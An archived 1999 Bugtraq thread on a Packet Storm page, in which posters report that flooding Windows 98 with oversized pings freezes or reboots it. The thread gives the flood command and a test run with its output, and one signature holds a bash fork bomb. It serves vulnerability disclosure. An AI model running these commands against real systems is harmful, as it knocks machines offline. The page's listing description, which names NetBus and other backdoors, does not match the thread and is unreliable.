exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

windows98.pingflood.txt

windows98.pingflood.txt
Posted Aug 17, 1999

ISS X-Force advisory concerning Windows backdoors, specifically NetBus 2.0 Pro, Caligula, and Picture.exe. An excellent analysis of the new NetBus 2.0 Pro is included, making this a "must read" file.

tags | exploit
systems | windows
SHA-256 | cee3bc26d8ed5956ce96c31b7db8db96054271f17ea1d74781c5e958a82dc31f

windows98.pingflood.txt

Change Mirror Download
Date: Wed, 17 Feb 1999 03:17:26 -0300
From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
To: BUGTRAQ@netspace.org
Subject: Pingflood attack against Windows98

rewt wrote:
>
> Try pinging the windows box with large amounts of icmp...I left 5
> screened pings, each set to 65000 size...Windows will freeze shortly
> after its loaded. You might also try to ping with -f.
>

Hey...
I made what you suggested, and it's true... But in my case the
results were a little worse than yours...
Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
to make several screen boxes... With only one ping -f 65000 the system
rebooted.

Best Regards
-------------------------------
Fabio Bastiglia Oliva - Director
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

----------------------------------------------------------------------

Date: Thu, 18 Feb 1999 13:32:00 -0500
From: Mark A. Heilpern <heilpern@MINDSPRING.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Pingflood attack against Windows98

At 03:17 AM 2/17/99 -0300, you wrote:
>rewt wrote:
>>
>> Try pinging the windows box with large amounts of icmp...I left 5
>> screened pings, each set to 65000 size...Windows will freeze shortly
>> after its loaded. You might also try to ping with -f.
>>
>
>Hey...
> I made what you suggested, and it's true... But in my case the
>results were a little worse than yours...
> Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
>to make several screen boxes... With only one ping -f 65000 the system
>rebooted.

I issued "ping -f -s 65000 my-win98-address" and after a single return, win98
locked up cold. I was ssh'd from win98 to linux to issue the ping, so I might
have had more returns than timing allowed to be displayed before I locked
up.

----------------------------------------------------------------------

Date: Thu, 18 Feb 1999 21:44:24 -0300
From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Pingflood attack against Windows98

Hello all,

As I said before, forgive me, because my english is not so good!
I'll make a "Multi-reply" in this email... It's easier ;)
Thanks for all the replies!

------------------------------------------------------------------------
------------------------------------------------------------------------
James <pyro@pyro.za.net> wrote:
>
> This on a LAN or Internet or both?
>
> I made this test in my LAN.

-LAN Speed: 10Mbits.
-NICs (Network Interface Card): 3Com905btx, Genius, Encore & Realtek.
-Hubs: 3Com Super Stack II.
-Windows98 Versions: 4.10.1998 (Portuguese and English versions)

------------------------------------------------------------------------
------------------------------------------------------------------------
Laurent LEVIER <llevier@argosnet.com> wrote:
>
> I tried with the French version of Windows 98.
>
> when I run ping -l 65000 -f IPaddr.
>
> ping refuses. Of course ping -f 65000 is not accepted too.
>
> Strange the ping command changes between US & FR version.
>

Sorry, I made a mistake when sent the email to Bugtraq. The
correct command (From Linux Slackware 3.6 Kernel 2.0.36) line is:

ping -f -s 65000 IPaddr

------------------------------------------------------------------------
------------------------------------------------------------------------
Quantum <fusion77@bellsouth.net> wrote:
>
> I just tried it & had no success at my Win98 dos prompt,
>

Try from a linux... I got these results flooding from a
Linux Slackware 3.6 Kernel 2.0.36...

------------------------------------------------------------------------
------------------------------------------------------------------------
Tom Van Riper <tomv@dreamscape.com>
>
> yeah no kidding, the world has known a dialup connection weither it be
> windows or a unix type operating system, that a small amount of icmp
> packets will kill the connection for years, thats old stuff.
> try synfluding on ports 0-65535 for some real fun ;)

Hehe... But a synflood just made the LAN Communication slower,
and didn't affected Windows 98 than pingflood affected!

Tom Van Riper
Dreamscape Online

------------------------------------------------------------------------

Best Regards
-------------------------------
Fabio Bastiglia Oliva - Diretor
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

----------------------------------------------------------------------

Date: Fri, 19 Feb 1999 01:16:44 -0300
From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
To: BUGTRAQ@netspace.org
Subject: Pingflood attack against Windows98 - The Test

Hello all,

This is what is happening when I ping flood a Windows98 from a
Linux Slackware 3.6 (Kernel 2.0.36).


-Before the attack-

linux:~# ping 192.168.1.4
PING 192.168.1.4 (192.168.1.4): 56 data bytes
64 bytes from 192.168.1.4: icmp_seq=0 ttl=128 time=0.5 ms
64 bytes from 192.168.1.4: icmp_seq=1 ttl=128 time=0.5 ms

--- 192.168.1.4 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.5/0.5/0.5 ms


-The Attack-

linux:~# ping -f -s 65000 192.168.1.4
PING 192.168.1.3 (192.168.1.4): 65000 data bytes
.......................................................................
...................................................../*After lots of
little dots... Windows98 Rebooted*/...<CTRL+C>

--- 192.168.1.4 ping statistics ---
11440 packets transmitted, 228 packets received, 98% packet loss
round-trip min/avg/max = 0.6/32.0/64.2 ms


-After the attack-

linux:~# ping 192.168.1.4
PING 192.168.1.4 (192.168.1.4): 56 data bytes

--- 192.168.1.4 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss

---

It's what's happening here... Anyone of you got the same
results?

Best Regards
--------------------------------
Fabio Bastiglia Oliva - Director
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

----------------------------------------------------------------------

Date: Thu, 11 Feb 1999 03:43:10 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: Re: Pingflood attack against Windows98

Sorry, but I'm afraid this thread is a little bit out-of-date. Pingflood
against Windows 95/98 is a well-known shool DoS. ping -s -f or ping -s -l
over local networks seems to cause Windows to lock-on permanently (or
temporarily, depending on weather), or even reboot. Is there anything more
to talk about?:>

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]

----------------------------------------------------------------------

Date: Mon, 22 Feb 1999 04:04:44 -0300
From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Pingflood attack against Windows98

Michal Zalewski wrote:
>
> Sorry, but I'm afraid this thread is a little bit out-of-date.
> Pingflood against Windows 95/98 is a well-known shool DoS. ping -s -f
> or ping -s -l over local networks seems to cause Windows to lock-on
> permanently (or temporarily, depending on weather), or even reboot.
> Is there anything more to talk about?:>
>

Dear Mr. Zalewski,

Since Microsoft's announced that Windows 95 DoSs were corrected
in Windows 98, and we found this bug AGAIN... I think that this thread
IS NOT out-of-date.

Best Regards
--------------------------------
Fabio Bastiglia Oliva - Director
fboliva@safenetworks.com

Safe Networks Informatica LTDA.
http://www.safenetworks.com

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close